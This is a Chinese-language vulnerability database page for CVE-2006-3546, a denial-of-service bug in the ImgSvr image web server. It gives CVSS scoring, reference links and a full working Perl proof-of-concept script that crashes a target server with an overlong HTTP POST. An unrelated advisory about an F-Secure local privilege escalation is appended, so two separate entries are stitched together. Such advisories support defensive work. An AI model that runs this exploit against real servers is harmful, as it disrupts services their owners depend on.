CVE-2006-3546
CVSS5.0
发布时间 :2006-07-12 20:05:00
修订时间 :2008-09-05 17:07:26
NMCOE    

[原文]Patrice Freydiere ImgSvr (aka ADA Image Server) allows remote attackers to cause a denial of service (daemon crash) via a long HTTP POST request. NOTE: this might be the same issue as CVE-2004-2463.


[CNNVD]ImgSvr 长的HTTP POST缓冲区溢出漏洞(CNNVD-200607-163)

        ImgSvr是一款简单的全功能的Web Server,主要优化用于浏览数字图像。
        ImgSvr处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能通过发送超长的HTTP POST请求导致ImgSvr崩溃。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3546
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3546
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-163
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18784
(UNKNOWN)  BID  18784
http://www.securityfocus.com/archive/1/archive/1/438971/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060703 imgsvr dos exploit by n00b
http://xforce.iss.net/xforce/xfdb/27613
(UNKNOWN)  XF  imgsvr-http-post-dos(27613)
http://securityreason.com/securityalert/1232
(UNKNOWN)  SREASON  1232

- 漏洞信息

ImgSvr 长的HTTP POST缓冲区溢出漏洞
中危 其他
2006-07-12 00:00:00 2006-09-13 00:00:00
远程  
        ImgSvr是一款简单的全功能的Web Server,主要优化用于浏览数字图像。
        ImgSvr处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能通过发送超长的HTTP POST请求导致ImgSvr崩溃。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://adaimgsvr.sourceforge.net/

- 漏洞信息 (1980)

ImgSvr <= 0.6.5 (long http post) Denial of Service Exploit (EDBID:1980)
windows dos
2006-07-04 Verified
0 n00b
N/A [点击下载]
#!/usr/bin/perl
##Proof of concept.
#################################################################################
#Credit's:to n00b for finding this bug.
#
#Afected :ImgSvr.exe
#
#Download softwear: http://freshmeat.net/projects/imgsvr/
#
#Crash the server with overly long http post request..
#
#Main site of affected product. http://freshmeat.net/projects/imgsvr/
#Sending an overly long post request will crash the server with the following.
#Acsess violation..
#Tested :win xp sp1..
#
#error:500 Server closed connection without sending any data back
#this is a error msg will receive on successful exploitation.
#################################################################################
##(e7c.168): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414142 ebx=00000000 ecx=00000000 edx=00000002 esi=41414141 edi=00000000
# eip=006bf546 esp=022ab1c4 ebp=022ab628 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
# *** WARNING: Unable to verify checksum for C:\Program Files\Imgsvr\imgsvr.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Imgsvr\imgsvr.exe
# imgsvr+0x2bf546:
# 006bf546 881c30           mov     [eax+esi],bl            ds:0023:82828283=??
###################################################################################
#
# Usage: imageserv.pl change to your ip 127.0.0.1 < vic ip port 1235
###################################################################################


use LWP::UserAgent;
$ua = LWP::UserAgent->new;

my $host = shift or die("insert a target");

my $req = HTTP::Request->new(POST => "http://$host:80/" . A x 1500);

$req->content_type('application/x-www-form-urlencoded');
$req->content('match=www&errors=0');

my $res = $ua->request($req);
print $res->as_string;

# milw0rm.com [2006-07-04]
		

- 漏洞信息

20540
F-Secure Anti-Virus Internet Gatekeeper/Linux Gateway version_suid.cgi Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

F-Secure Anti-Virus Internet Gatekeeper for Linux and F-Secure Anti-Virus Linux Gateway contain a flaw that may allow a malicious local user to elevate privileges to root. The issue is triggered when a user creates a malicious script named version.cgi in the current working directory, and executes the SUID script version_suid.cgi using its full path. The SUID script will execute the malicious script because it looks for it in the working directory. This flaw may lead to a loss of integrity.

- 时间线

2005-11-07 2005-09-29
Unknow Unknow

- 解决方案

Upgrade F-Secure Anti-Virus Internet Gatekeeper for Linux to version 2.15.484 or higher. Upgrade F-Secure Anti-Virus Linux Gateway to version 2.16 or higher, as these updates have been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: For F-Secure Internet Gatekeeper for Linux: "chmod -s /opt/f-secure/fsigk/cgi/*suid.cgi" For F-Secure Anti-Virus Linux Gateway: "chmod -s /home/virusgw/cgi/*suid.cgi"

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站